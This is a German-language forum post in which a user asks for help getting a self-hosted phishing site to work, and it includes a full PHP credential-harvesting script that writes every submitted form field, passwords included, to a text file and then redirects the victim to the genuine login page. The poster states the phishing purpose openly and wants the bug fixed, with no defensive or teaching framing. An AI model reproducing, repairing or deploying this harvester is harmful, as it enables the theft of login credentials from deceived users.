Phishing von lokalem Rechner aus

[Draik]

hallo,
ich hab versucht eine phishing-site einzurichten, die bei mir von einem apache webserver aus läuft. leider wird nicht das passwort gespeichert, sondern einfach nur die file, die das passwort abspeichern soll, in einer neuen seite geöffnet, da steht dann einfach nur der inhalt:

<?php
header ('Location: http://www.site.com/login.php ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
/edit das problem besteht auch weiterhin, wenn die save.php auf einem (lokalen) ftp server liegt. (liegt das evtl an den schreibrechten?)

ich hab sicher irgend nen noobigen fehler gemacht, bitte helft mir ;D